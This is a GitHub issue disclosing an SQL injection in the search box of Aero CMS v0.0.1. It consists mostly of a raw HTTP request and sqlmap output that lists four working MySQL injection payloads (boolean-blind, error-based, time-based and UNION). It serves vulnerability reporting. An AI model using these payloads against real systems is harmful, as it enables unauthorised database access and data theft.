Skip to content
This repository has been archived by the owner on May 8, 2023. It is now read-only.

Aero CMS v0.0.1 - SQL Injection (search box) #12

Open
MorphyKutay opened this issue Apr 25, 2023 · 0 comments
Open

Aero CMS v0.0.1 - SQL Injection (search box) #12

MorphyKutay opened this issue Apr 25, 2023 · 0 comments

Comments

@MorphyKutay
Copy link

POST /search.php HTTP/1.1
Host: 192.168.243.133
Content-Length: 19
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.243.133/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.243.133/search.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=dt1o6jbah3s8qdti60pg464i59
Connection: close

search='saas&submit=


sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:

Parameter: search (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: search=saas' OR NOT 8064=8064#&submit=

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=saas' AND (SELECT 8045 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8045=8045,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ZINc&submit=

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=saas' AND (SELECT 5006 FROM (SELECT(SLEEP(5)))tyOR)-- wINj&submit=

Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: search=saas' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7a71,0x5142655063635254574b6b4967424f53796e4f465a784a6e576b4868654868735956434d6e63544d,0x71766b7071),NULL,NULL,NULL,NULL,NULL,NULL#&submit=

image

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant